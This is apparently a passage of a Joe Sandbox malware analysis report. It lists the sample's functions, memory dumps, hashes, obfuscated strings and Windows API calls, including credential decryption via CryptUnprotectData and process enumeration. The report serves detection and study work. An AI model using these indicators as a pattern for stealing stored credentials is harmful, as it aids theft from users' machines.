                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6uw$b~F$r_$d${ ;^$[}?
                            • API String ID: 0-3414453374
                            • Opcode ID: c3ce10dc2a38f8e1c2d0fbe6a3d752d8900e85e5e74fc061d78ac95e932131d9
                            • Instruction ID: a8f58cb285829426c720c677289c3f1ff0ecd98ab879364f1ae8dde57c070cdc
                            • Opcode Fuzzy Hash: c3ce10dc2a38f8e1c2d0fbe6a3d752d8900e85e5e74fc061d78ac95e932131d9
                            • Instruction Fuzzy Hash: 34B205F360C2049FE3046E2DEC8567ABBE9EF94320F1A493DE6C4C7744EA3598458697
                            Function 0013F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: \u$\u${${$}$}
                            • API String ID: 0-582841131
                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction ID: 59f492af5010eb569ce932ab0bce47fbe12dd32a06842012de7b9f5f99b60c5b
                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction Fuzzy Hash: BE419F12E19BD9C5CB058B7444A02AEBFB22FE6210F6D82EEC4DD1F382C774414AD3A5
                            Function 000DC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC971
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC97C
                            • lstrcat.KERNEL32(?,000F0B47), ref: 000DCA43
                            • lstrcat.KERNEL32(?,000F0B4B), ref: 000DCA57
                            • lstrcat.KERNEL32(?,000F0B4E), ref: 000DCA78
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f2cb10fddd29b12f0235ce133827b87b1c0092cd700d2ece2ac5bdaa1b25b773
                            • Instruction ID: 33480fb84591befcf435fed7c9a481049ccd48e35b80e6cf0cf4aca0bb51c3ea
                            • Opcode Fuzzy Hash: f2cb10fddd29b12f0235ce133827b87b1c0092cd700d2ece2ac5bdaa1b25b773
                            • Instruction Fuzzy Hash: D6415C7590421EDBDB10CFA4DD89FFEB7B8AB49304F1045A9E609A7280D7745A84CFA1
                            Function 000D72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000D72AD
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000D72B4
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000D72E1
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000D7304
                            • LocalFree.KERNEL32(?), ref: 000D730E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: c76738f603c3435287c2deb38a9e039a827697a09b840dc3933b85794b4cfc03
                            • Instruction ID: 3cefd7b6f61fbffc950b5ea724db38ef39f169aa0ac4c177fef7dd20409fa2c3
                            • Opcode Fuzzy Hash: c76738f603c3435287c2deb38a9e039a827697a09b840dc3933b85794b4cfc03
                            • Instruction Fuzzy Hash: D6011E75A44308BBEB10DFE4DC46FAE7778EB44B00F108545FB05BB2C0D6B0AA409B64
                            Function 000E9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E97AE
                            • Process32First.KERNEL32(000F0ACE,00000128), ref: 000E97C2
                            • Process32Next.KERNEL32(000F0ACE,00000128), ref: 000E97D7
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 000E97EC
                            • CloseHandle.KERNEL32(000F0ACE), ref: 000E980A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 460db1a3b3055d142545c12b656d7734d5d3c887bc3aef8122b6280a2a432ac4
                            • Instruction ID: cae6aa3af57a233dad358982b8338e1ddc13bfacf997aa9c147af26aa313a62d
                            • Opcode Fuzzy Hash: 460db1a3b3055d142545c12b656d7734d5d3c887bc3aef8122b6280a2a432ac4
                            • Instruction Fuzzy Hash: DA010875A14208AFDB21DFA5CD88BEDBBFCBB49700F104588E909A6250EB309A44DF50
                            Function 000F4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: <7\h$huzx
                            • API String ID: 0-2989614873
                            • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                            • Instruction ID: 0d07da66965ec539353409d5ae7c7d3167fd38ff278ca15b294dde634989ab90
                            • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                            • Instruction Fuzzy Hash: 6763333241EBD81EC727CB304BB61617F66BB1361131D49CECAC18B9B3C6949A1AF356
                            Function 00531CA4 Relevance: 6.7, Strings: 4, Instructions: 1656COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 9R{g$FjZ$Tk$^sN
                            • API String ID: 0-4006639847
                            • Opcode ID: 9bede8b166b0e5cc9320a1f16a8c3df14df726100e26add76027049e604cfd1a
                            • Instruction ID: c2f67615792058e480c334e196cdaff486e6304eaa2f14def445d164fa463ec8
                            • Opcode Fuzzy Hash: 9bede8b166b0e5cc9320a1f16a8c3df14df726100e26add76027049e604cfd1a
                            • Instruction Fuzzy Hash: FAB22AF360C2049FE304AE2DEC4567ABBE9EF94720F1A893DE6C4C7744EA3558058796
                            Function 00527AA9 Relevance: 6.6, Strings: 4, Instructions: 1645COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: c\$6q9w${S}$}~x
                            • API String ID: 0-1896102235
                            • Opcode ID: 8faa601c3065a36f97a8471a503c1c6654aac55640b7d4b37b98185fec17cb54
                            • Instruction ID: 9bac58ea10008e5c291a3ebf7a32d75e6d8e28f7204fa54cd0a4bc565eaa2868
                            • Opcode Fuzzy Hash: 8faa601c3065a36f97a8471a503c1c6654aac55640b7d4b37b98185fec17cb54
                            • Instruction Fuzzy Hash: 95B207F360C2049FE304AE2DEC8567AFBE9EB94720F16493DEAC4C7744EA3558058697
                            Function 0051BE16 Relevance: 6.6, Strings: 4, Instructions: 1612COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !/C$.%a/$<Y}W$[s{m
                            • API String ID: 0-4121493079
                            • Opcode ID: 001c2d30a3148afb2374791ffc64fb10710acc994c570814d0f96069ce1e0767
                            • Instruction ID: 28e34ba643d669d4f7eff79ff0f32ec3ce519171f76a69f71fae7805025af384
                            • Opcode Fuzzy Hash: 001c2d30a3148afb2374791ffc64fb10710acc994c570814d0f96069ce1e0767
                            • Instruction Fuzzy Hash: A9B207F3A0C204AFE3046F2DEC8567ABBE9EB94720F16493DEAC5C3744E63558058697
                            Function 00535213 Relevance: 6.6, Strings: 4, Instructions: 1609COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?C>.$Ik$hWA{$m0q<
                            • API String ID: 0-3673785742
                            • Opcode ID: 8edd547f26a138e4dcd65fb1a149ebe776ad55e69f0bdb7cccb3efbe2cdb960c
                            • Instruction ID: 17c25486d2f09fcdaf64e063f8a41425f4ba2253948ca79d34e5ee7fc325dcad
                            • Opcode Fuzzy Hash: 8edd547f26a138e4dcd65fb1a149ebe776ad55e69f0bdb7cccb3efbe2cdb960c
                            • Instruction Fuzzy Hash: E9B2F5F3A0C2109FE3046E2DEC8566ABBE9EF94720F1A493DEAC4C7744E63558058797
                            Function 005337D0 Relevance: 6.6, Strings: 4, Instructions: 1607COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4&`@$86Z$cO0l$v[
                            • API String ID: 0-284000037
                            • Opcode ID: aedf1d6479cc524ad9c9e3004ce474e023cacc6641a61997194bbe0514ac3b31
                            • Instruction ID: db299e5bc878649235acfb84434db193ea0e446b9662772163a9fa8ea96b5e15
                            • Opcode Fuzzy Hash: aedf1d6479cc524ad9c9e3004ce474e023cacc6641a61997194bbe0514ac3b31
                            • Instruction Fuzzy Hash: 3CB2F7F360C2049FE3046E2DEC8567ABBE9EF94720F16893DEAC4C7744EA3558058796
                            Function 00520FA4 Relevance: 6.6, Strings: 4, Instructions: 1601COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
